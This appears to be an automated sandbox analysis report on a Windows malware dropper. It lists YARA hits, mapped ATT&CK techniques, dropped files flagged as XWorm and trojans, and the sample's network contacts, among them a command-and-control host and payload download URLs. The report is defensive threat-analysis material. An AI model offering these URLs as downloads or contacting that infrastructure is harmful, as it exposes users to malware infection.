                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		2
                      Scheduled Task/Job                      		12
                      Process Injection                      		11
                      Deobfuscate/Decode Files or Information                      		LSASS Memory2
                      File and Directory Discovery                      		Remote Desktop ProtocolData from Removable Media11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter                      		21
                      Registry Run Keys / Startup Folder                      		2
                      Scheduled Task/Job                      		12
                      Obfuscated Files or Information                      		Security Account Manager34
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Scheduled Task/Job                      		Login Hook21
                      Registry Run Keys / Startup Folder                      		2
                      Software Packing                      		NTDS1
                      Query Registry                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      PowerShell                      		Network Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets561
                      Security Software Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials2
                      Process Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync151
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                      Process Injection                      		/etc/passwd and /etc/shadow11
                      System Network Configuration Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579069 Sample: YgJ5inWPQO.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 98 hope-asia.gl.at.ply.gg 2->98 100 www.nodejs.org 2->100 102 7 other IPs or domains 2->102 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 18 other signatures 2->120 11 YgJ5inWPQO.exe 12 2->11         started        15 System User.exe 2->15         started        17 System User.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 file5 90 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->90 dropped 92 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 11->92 dropped 94 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 11->94 dropped 96 7 other malicious files 11->96 dropped 136 Found pyInstaller with non standard icon 11->136 21 YgJ5inWPQO.exe 3 11->21         started        signatures6 process7 file8 86 C:\Users\user\AppData\Local\Temp\msedge.exe, PE32 21->86 dropped 88 C:\Users\user\AppData\Local\Temp\dddd.exe, PE32+ 21->88 dropped 134 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->134 25 cmd.exe 1 21->25         started        27 cmd.exe 1 21->27         started        29 cmd.exe 1 21->29         started        32 cmd.exe 1 21->32         started        signatures9 process10 signatures11 34 msedge.exe 15 6 25->34         started        39 conhost.exe 25->39         started        41 dddd.exe 14 8 27->41         started        43 conhost.exe 27->43         started        138 Uses cmd line tools excessively to alter registry or file data 29->138 140 Uses ipconfig to lookup or modify the Windows network settings 29->140 45 conhost.exe 29->45         started        47 attrib.exe 1 29->47         started        49 conhost.exe 32->49         started        51 attrib.exe 1 32->51         started        process12 dnsIp13 104 hope-asia.gl.at.ply.gg 147.185.221.18, 35710, 49723, 49752 SALSGIVERUS United States 34->104 106 ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States 34->106 82 C:\Users\user\AppData\...\System User.exe, PE32 34->82 dropped 122 Antivirus detection for dropped file 34->122 124 Multi AV Scanner detection for dropped file 34->124 126 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 34->126 130 5 other signatures 34->130 53 powershell.exe 23 34->53         started        56 powershell.exe 34->56         started        58 powershell.exe 34->58         started        66 2 other processes 34->66 108 edge-term4-fra2.roblox.com 128.116.123.3, 443, 49708 ROBLOX-PRODUCTIONUS United States 41->108 110 www.nodejs.org 104.20.22.46, 443, 49709 CLOUDFLARENETUS United States 41->110 112 2 other IPs or domains 41->112 84 \Device\ConDrv, ISO-8859 41->84 dropped 128 Machine Learning detection for dropped file 41->128 60 cmd.exe 1 41->60         started        62 conhost.exe 41->62         started        64 WerFault.exe 41->64         started        file14 signatures15 process16 signatures17 132 Loading BitLocker PowerShell Module 53->132 68 conhost.exe 53->68         started        70 conhost.exe 56->70         started        72 conhost.exe 58->72         started        74 ipconfig.exe 1 60->74         started        76 conhost.exe 60->76         started        78 conhost.exe 66->78         started        80 conhost.exe 66->80         started        process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      YgJ5inWPQO.exe26%ReversingLabsWin64.Backdoor.Jalapeno

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\msedge.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Roaming\System User.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Local\Temp\msedge.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\dddd.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\System User.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\select.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\dddd.exe63%ReversingLabsWin64.Trojan.Heracles
                      C:\Users\user\AppData\Local\Temp\msedge.exe82%ReversingLabsWin32.Exploit.Xworm
                      C:\Users\user\AppData\Roaming\System User.exe82%ReversingLabsWin32.Exploit.Xworm

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      nodejs.org
                      		104.20.22.46
                      		truefalse
                        		high
                        getsolara.dev
                        		104.21.93.27
                        		truefalse
                          		high
                          edge-term4-fra2.roblox.com
                          		128.116.123.3
                          		truefalse
                            		high
                            www.nodejs.org
                            		104.20.22.46
                            		truefalse
                              		high
                              ip-api.com
                              		208.95.112.1
                              		truefalse
                                		high
                                hope-asia.gl.at.ply.gg
                                		147.185.221.18
                                		truetrue
                                  		unknown
                                  clientsettings.roblox.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    hope-asia.gl.at.ply.ggtrue
                                      		unknown
                                      https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalse
                                        		high
                                        https://getsolara.dev/asset/discord.jsonfalse
                                          		high
                                          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalse
                                            		high
                                            https://getsolara.dev/api/endpoint.jsonfalse
                                              		high
                                              http://ip-api.com/line/?fields=hostingfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://127.0.0.1:6463dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.nodejs.orgdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://crosoft.com/pkiops/cerpowershell.exe, 0000001B.00000002.1758362165.0000013850D50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://schemas.micpowershell.exe, 0000001E.00000002.1938005634.00000254D6363000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.microsoft.copowershell.exe, 0000001B.00000002.1757718254.0000013850C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Licensepowershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ncs.roblox.com/uploaddddd.exe, 0000000E.00000002.1731703513.00000262341C9000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.nodejs.orgdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dirdddd.exe, 0000000E.00000002.1731703513.00000262341DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataYgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1489435505.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494618160.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://aka.ms/vs/17/release/vc_redist.x64.exeYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.DirOfdddd.exe, 0000000E.00000002.1731703513.0000026234122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://contoso.com/powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.micft.cMicRosofpowershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://peps.python.org/pep-0205/YgJ5inWPQO.exe, 00000002.00000003.1473302298.000001D8A78EA000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1496226400.000001D8A97FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.microsoft.cYgJ5inWPQO.exe, 00000000.00000003.1464219398.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2195632946.0000020BF8D56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://127.0.0.1:6463/rpc?v=1dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 0000000C.00000002.2742589628.000000000261B000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://edge-term4-fra2.roblox.comdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameYgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488956192.000001D8A9415000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491431607.000001D8A9417000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://nodejs.orgdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://discord.comdddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerYgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.micpowershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://docs.python.org/3/howto/mro.html.YgJ5inWPQO.exe, 00000002.00000002.1494882785.000001D8A94E0000.00000004.00001000.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A94AF000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1476006333.000001D8A94BB000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A9448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packageYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://james.newtonking.com/projects/jsondddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_moduleYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syYgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://getsolara.devdddd.exe, 0000000E.00000002.1731703513.0000026234105000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://discord.com;http://127.0.0.1:6463/rpc?v=11YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.jsonYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exedddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://getsolara.devdddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340FA000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.jsonYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://127.0.0.1:64632dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.newtonsoft.com/jsonschemadddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.nuget.org/packages/Newtonsoft.Json.BsonYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://crl.m~powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://aka.ms/pscore68powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.python.org/psf/license/)YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyYgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
